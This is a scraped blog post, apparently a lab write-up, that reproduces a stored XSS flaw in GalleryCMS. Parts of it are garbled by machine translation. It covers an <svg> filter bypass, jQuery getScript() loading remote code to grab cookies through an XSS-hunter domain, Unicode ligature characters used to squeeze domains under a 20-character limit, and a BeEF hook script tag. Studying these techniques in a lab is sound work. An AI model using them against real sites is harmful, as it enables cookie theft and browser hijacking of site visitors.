当前位置:网站首页>XSS holes emersion
XSS holes emersion
2022-08-03 21:11:00 【hug kitten】
目录
XSS复现GalleryCMSCharacter length limit short domain name bypass
第一步:First upload a string at will,See where the string was last entered
第二步:Let's test it again to see if it worksJS代码
第四步:beef复现GalleryCMS20character limit short domain name bypass
XSS复现GalleryCMSCharacter length limit short domain name bypass
We build it firstgalleryCMS的服务器.
第一步:First upload a string at will,See where the string was last entered
The data we uploaded can be seen in the database
第二步:Let's test it again to see if it worksJS代码
displayed in the database as,这说明对JS代码有限制,As a result, we can't make the pop-up window
我们查看一下源码,It can be seen that he did length to us45,And filter a lot of tags and other restrictions
But it can be seen from the source code that there is nothing right<svg>标签进行限制,所以我们尝试使用<svg>Whether the label test can be bypassed
绕过成功:
第三步:使用getScript()函数绕过
We found through this page that the web page is using jQuery框架,我们尝试使用getScript()Try bypassing the function.
getScript()函数:使用 AJAX 的 HTTP GET 请求获取和执行 JavaScript.
语法:(selector).getScript(url,success(response,status))
| 参数 | 描述 |
|---|---|
| url | 必需.规定将请求发送到哪个 URL. |
| success(response,status) | 可选.规定当请求成功时运行的函数. 额外的参数:
|
我们尝试将<svg>标签和getScriptGet it togethercookie值
我们使用了xss-hunterA page allocated to the system,telsm.xss.htThere are many functions for obtaining information,Requires registration and has a custom onexss.htOnly subdomains can be used,But I didn't register the domain name,So I can't see the obtained message,But it also means success.
第四步:beef复现GalleryCMS20character limit short domain name bypass
We changed the maximum character limit length to 20个字符,利用beeftools try to bypass
But the basic commands will be over20个字符
由于字符长度限制,How to achieve bypass?
1、使用Unicode编码进行编码,UnicodeThe encoding has several special characters,如tel在UnicodeOnly one character is counted in
2、域名重定向-->Domestic domain name redirection requires filing,Only foreign domain names can be used
We use the first methodUnicodeThe encoding is bypassed with special characters
- ℠ expands to
sm - ㏛ expands to
sr - st expands to
st - ㎭ expands to
rad - ℡ expands to
tel
我们先打开beef-xss:
登陆beef的网页端,beef的用户名和密码在/etc/beef-xss/config.yml文件下查看
把hook.jsThe contents of the file are copied to the server/var/www/html/index.html文件下,Because I don't have my own domain name,So I can modify the configuration file by myself,使用ip进行测试<script src="//192.168.112.131:3000/hoot.js">
成功了
参考资料:
边栏推荐
- nvm的使用 nodejs版本管理,解决用户名是汉字的问题
- 5 款漏洞扫描工具:实用、强力、全面(含开源)
- leetcode 268. 丢失的数字(异或!!)
- 小朋友学C语言(1):Hello World
- Zero trust, which has been popular for more than ten years, why can't it be implemented?
- CC2530_ZigBee+华为云IOT:设计一套属于自己的冷链采集系统
- 力扣707-设计链表——链表
- 迪赛智慧数——柱状图(多色柱状图):2021年我国城市住户存款排名
- 独立站卖家在哪些平台做社交媒体营销效果最好?
- leetcode 1837. K 进制表示下的各位数字总和
猜你喜欢
基于data.table的tidyverse?
Often forget HiFlow 】 【 check-in?Use tencent cloud scenario connector to remind you every day.
Several difficult problems in DDD
数据库定时备份winserver2012篇
Lecture topics and guest blockbuster, TDengine developers conference to promote data technology "broken"
DDD 中的几个困难问题
手动输入班级人数及成绩求总成绩和平均成绩?
简单又有效的基本折线图制作方法
svg胶囊药样式切换按钮
在树莓派上搭建属于自己的网页(3)
随机推荐
Li Mu hands-on learning deep learning V2-BERT fine-tuning and code implementation
LeetCode_位数统计_中等_400.第 N 位数字
ES6-箭头函数
XSS线上靶场---haozi
Markdown语法
在树莓派上搭建属于自己的网页(3)
XSS练习---一次循环和两次循环问题
直播小程序源码,UI自动化中获取登录验证码
Leetcode 899. An orderly queue
chartjs自定义柱状图插件
leetcode 231. Powers of 2
Five Steps to Detect and Control Shadow IT
2022年强网杯rcefile wp
NAACL 2022 | 具有元重加权的鲁棒自增强命名实体识别技术
开源一夏 |如何优化线上服务器
Use setTimeout to realize setInterval
leetcode 326. Powers of 3
Several difficult problems in DDD
leetcode 1837. The sum of the digits in the K-base representation
XSS测试